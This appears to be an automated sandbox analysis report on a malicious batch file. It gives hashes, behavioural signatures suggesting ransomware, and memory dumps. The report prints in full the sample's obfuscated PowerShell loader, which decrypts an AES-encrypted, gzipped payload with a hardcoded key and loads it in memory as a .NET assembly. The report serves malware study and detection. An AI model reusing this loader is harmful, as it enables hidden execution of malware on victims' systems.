Analysis
-
max time kernel
62s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
-
submitted
31-03-2023 16:01
General
-
Target
$RECYCLE.BIN/$RJXIQS1.bat
-
Size
325KB
-
MD5
09329152d36bbe721ce3504787436cf2
-
SHA1
713a6fb0da4a111649bc7268f193ba52463e3576
-
SHA256
67e3ece7d1bf12285f01930d6eb28b91ba4a02551d24648ddc79a17cbb9d9423
-
SHA512
ee5ad3c41a7822bcc759fa3a33dd2d404cf57f1b074973a61f59c2163bb4062c908b820eb9a0e7fde009be42e6cdcab85ea5373805bbc242ea47957c9fd44a7e
-
SSDEEP
6144:uhhAqNRvU+SV6ukYulDTHKqFSC6M+cnyJZAneGwJZfNiINj:uhhAANCkJlqqFSC6dcyQo15j
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
-
Loads dropped DLL 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat.exe"$RJXIQS1.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $Mulkj = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat').Split([Environment]::NewLine);foreach ($IRhUZ in $Mulkj) { if ($IRhUZ.StartsWith(':: ')) { $DfRfS = $IRhUZ.Substring(3); break; }; };$tUDnz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($DfRfS);$mhFKv = New-Object System.Security.Cryptography.AesManaged;$mhFKv.Mode = [System.Security.Cryptography.CipherMode]::CBC;$mhFKv.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$mhFKv.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sLPwO8+S6swu7bBaCR3UKxvgiQCK9eRNWGiIj+Y64B4=');$mhFKv.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wgIbPD7/o3xb1XnxDadMKQ==');$lUXqc = $mhFKv.CreateDecryptor();$tUDnz = $lUXqc.TransformFinalBlock($tUDnz, 0, $tUDnz.Length);$lUXqc.Dispose();$mhFKv.Dispose();$Trzho = New-Object System.IO.MemoryStream(, $tUDnz);$SevxL = New-Object System.IO.MemoryStream;$lSUMa = New-Object System.IO.Compression.GZipStream($Trzho, [IO.Compression.CompressionMode]::Decompress);$lSUMa.CopyTo($SevxL);$lSUMa.Dispose();$Trzho.Dispose();$SevxL.Dispose();$tUDnz = $SevxL.ToArray();$LtGjo = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($tUDnz);$tvDtB = $LtGjo.EntryPoint;$tvDtB.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
memory/1340-59-0x0000000002610000-0x0000000002690000-memory.dmpFilesize
512KB
-
memory/1340-60-0x0000000002610000-0x0000000002690000-memory.dmpFilesize
512KB
-
memory/1340-61-0x000000001B010000-0x000000001B2F2000-memory.dmpFilesize
2.9MB
-
memory/1340-62-0x0000000001D10000-0x0000000001D18000-memory.dmpFilesize
32KB
-
memory/1340-63-0x0000000002610000-0x0000000002690000-memory.dmpFilesize
512KB
-
memory/1340-64-0x0000000002610000-0x0000000002690000-memory.dmpFilesize
512KB